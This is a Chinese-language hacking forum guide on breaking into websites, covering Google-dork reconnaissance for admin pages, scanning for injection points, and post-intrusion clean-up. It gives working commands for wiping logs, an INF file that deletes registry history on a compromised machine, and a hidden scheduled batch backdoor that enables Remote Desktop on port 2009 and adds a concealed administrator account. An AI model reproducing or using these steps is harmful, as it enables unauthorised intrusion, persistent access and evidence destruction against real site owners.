一、入侵前的侦察。
首先打开代理或VPN再做如下工作:
第一步:个人感觉,侦察时用来GOOGLE,用以下命令查后台和敏感信息:
site:www.****.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:www.*****.com inurl:login|admin|manage|manager|admin_login|login_admin|system
site:www.***.com intitle:管理|后台|登陆|
site:www.****.com intext:验证码
第二步:推荐用TOOLS出品的wwwscan_gui.exe,扫描指定网站目录。这个工具,可以自己DIY里面的字典文件。论坛里有MJJ的社工字典和其他人发的字典工具,都可以加进去。
第三步:用明小子,再次扫描指定网站的注入点、数据库、后台文件。并扫描有没有可能跨站。不要用现成的明小子,自己DIY数据库文件。甚至可以用X-CAN3.0对指定网站的端口如TELNET,FTP扫描。
第四步:根据以上信息,比如,网站类型,管理员注册信息,端口信息。再次GOOGLE收集网站足够多的信息。
二、入侵一般步骤(忽略:因为论坛MJJ们发的东西足够多也足够技术了,本人不再班门弄斧)
三、入侵后的善后工作。
毫无疑问的是三个字:别装B!
第一:别挂黑页,那是小孩子做的事,如果真要挂黑的话,不留下QQ号等个人信息,个人认为这是很重要的事。
第二:清理痕迹:建议用两个工具一是AIO,个人发现,现在的肉鸡上执行命令越来越难了,这个工具执行命令也难多了,但是清理痕迹功能始终很好,很强大。用法:路径\Aio.exe -CleanLog,另一个工具是微软自带的psloglist.exe,这个软件始终不会被杀,也很好很强大,用法,用法可以命令行下/?一下。
第三:用如下方法清理一下上网的痕迹,因为毕竟我们有时会用肉鸡上一下网等等的。
[version]
signature="$CHICAGO$"
[Defaultinstall]
delreg=deleteme
addreg=addme
[deleteme]
hkcu,"software\microsoft\internet explorer\typedurls"
hkcu,"Software\Microsoft\Windows\CurrentVersion\Applets\Paint\recent file list"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\findcomputermru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\prnportsmru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\recentdocs"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\runmru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\streammru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\streams"
将以上内容保存为 inf 文件 再在此文件点右键安装 即可清除痕迹了,INF文件放于C下,也不易发现。
第四:做下后门,毕竟象SHIFT后门容易让人发现也不强大,所以我们不如直接用BAT作入系统计划任务中:代码如下:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f //开启终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d9 /f //改为2009连接终端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7d9 /f //改为2009连接终端
net user 444 000123 /add
net localgroup administrators 444 /add
以上成为一个BAT文件,然后属性改为隐藏,放入系统计划中。定时运行。当然用这个之前必须看看它的AT服务开了没有,如没有用以下命令执行:
sc config Schedule start= auto net start schedule
当然,直接进入服务改更好便当。